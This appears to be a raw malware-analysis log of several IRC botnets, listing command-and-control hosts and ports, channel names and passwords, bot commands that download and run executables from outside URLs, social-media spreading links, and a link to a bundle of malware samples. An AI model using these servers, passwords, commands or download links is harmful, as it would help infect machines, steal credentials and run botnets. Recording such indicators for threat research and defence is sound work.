Remote Host        Port Number
174.37.200.82      80
204.0.5.35         80
216.178.38.224     80
63.135.80.46       80
66.220.149.25      80
216.240.131.95     1234

PASS xxx MODE NEW-[USA|00|P|57896] -ix JOIN #!nn! test PONG 22 MOTD NICK NEW-[USA|00|P|57896] USER XP-0495 * 0 :COMPUTERNAME

Info about hosting: http://whois.domaintools.com/216.240.131.95
pulpin.upda.in (botnet hosted in United States Dallas Colo4dallas Lp)
DNS Lookup

Host Name          IP Address
dell-d3e62f7e26    10.1.10.2
pulpin.upda.in     174.136.0.29
pulpin.sch.in
schn.no-ip.info    174.129.88.121

Outgoing connection to remote server: pulpin.upda.in TCP port 666
Outgoing connection to remote server: schn.no-ip.info TCP port 666
Outgoing connection to remote server: pulpin.upda.in TCP port 666

Remote Host        Port Number
173.192.205.192    80
70.38.98.237       80
70.38.98.238       80
174.136.0.29       666

PASS dandodando MODE
163.20.108.31 (botnet hosted in Taiwan Taipei Tanet Taipei Nccu Regional Network)
Remote Host        Port Number
163.20.108.31      1863
208.75.230.43      80

* The data identified by the following URLs was then requested from the remote web server:
  o http://www.freewebtown.com/newlow/im.exe
  o http://www.freewebtown.com/newlow/photo.exe

JOIN #newbin# abc PONG 422
PRIVMSG #newbin# :[Download]: Downloading File From: http://www.freewebtown.com/newlow/im.exe, To: C:Documents and SettingsUserNameApplication Dataqghumeaylnlfdxfircvs85.exe
PRIVMSG #newbin# :[Download]: File Successfully Downloaded To: C:Documents and SettingsUserNameApplication
59.61.93.126 (botnet hosted in China Xiamen Chinanet Fujian Province Network)
Remote Host        Port Number
59.61.93.126       81

NICK n[USA|XP]7424992 USER s "" "lol" :s JOIN #newbin# JOIN #bin# abc PONG 422

Now talking in #newbin#
Topic On: [ #newbin# ] [ .dl http://www.freewebtown.com/newlow/im.exe ]
Topic By: [ rm- ]
(rm) !im http://tiny.cc/facebook-photo-18-02-2011

Info about hosting: http://whois.domaintools.com/59.61.93.126
Another malware package
Here are around 34 MB of malware samples (fake antiviruses, passwd stealers, banking trojans, etc.). Download: http://www.p1nk.me/VtzvTy
dns.googleure.com (botnet hosted in Russian Federation 2x4.ru Network)
dns.googleure.com DNS_TYPE_A 92.241.164.227
92.241.164.227:1234

Nick: n{US|XPa}xvwpyyv
Username: xvwpyyv
Server Pass: null
Joined Channel: #!ngr! with Password ngrBot
Joined Channel: #US
Channel Topic for Channel #!ngr!: ".mod pdef off .s .j -c IT,ITA,ES,ESP,FR,FRA #uz4 .up http://jeanie.ws/new.exe 3c62c54ff04ae4af8262ae4d5e2683c7"
Private Message to Channel #!ngr!: "[d="http://jeanie.ws/new.exe" s="278528 bytes"] Updated bot file "C:Documents and SettingsAdministratorApplication DataDekfki.exe""

Info about hosting: http://whois.domaintools.com/92.241.164.227
nice.niceshot.in (botnet hosted in Netherlands Rijndata B.v)
Remote Host        Port Number
46.21.169.42       6567

PASS s1m0n3t4 MODE [SI|USA|00|P|57896] -ix JOIN #yur# c1rc0dusoleil PONG Apple.Network NICK [SI|USA|00|P|57896] USER XP-0495 * 0 :COMPUTERNAME MODE [SI|USA|00|P|69385] -ix JOIN #wal# c1rc0dusoleil PRIVMSG #wal# :[Dl]: File download: 96.0KB to: C:DOCUME~1UserNameLOCALS~1Temperaseme_12581.exe @ 96.0KB/sec. QUIT [Update]: Updating to new bin. NICK [SI|USA|00|P|48857] USER XP-5184 * 0 :COMPUTERNAME MODE [SI|USA|00|P|48857] -ix
kay.gizliresimler.net (botnet hosted in United States Burlington The Endurance International Group Inc)
Remote Host        Port Number
209.59.221.182     3232

PASS pass MODE [USA|XP|959443] -ix JOIN #yah pass PRIVMSG #yah :[p2p]: Spreading to p2p folders. PONG HTTP1.4 NICK [USA|XP|959443] USER vsnzefq * 0 :COMPUTERNAME

Now talking in #yah
Topic On: [ #yah ] [ .p2p ]
Topic By: [ wc22 ]

Info about hosting: http://whois.domaintools.com/209.59.221.182
77.79.7.106 (botnet hosted in Lithuania Webhosting Collocation Services)
Remote Host        Port Number
174.37.72.72       80
204.0.5.56         80
216.178.38.224     80
63.135.80.46       80
69.63.181.16       80
77.79.7.106        6663

PASS xxx MODE NEW-[USA|00|P|01494] -ix JOIN #!nn! test PONG irc.priv8net.com NICK NEW-[USA|00|P|01494] USER XP-6931 * 0 :COMPUTERNAME

Now talking in #!nn!
Topic On: [ #!nn! ] [ .m.s|.m.e Foto 😀 http://apps.facebook.com/phootosofyour/photo.php?= ]
Topic By: [ wd38 ]
Topic: wd38
74.117.174.101 (botnet hosted in United States Seattle Kwshells Internet Services)
Remote Host        Port Number
74.117.174.101     32321

MODE pLagUe{USA}50784 -ix JOIN #p# PONG cbl-101-1.aster.com.pl PRIVMSG #p# : New PC Infected.

Info about hosting: http://whois.domaintools.com/74.117.174.101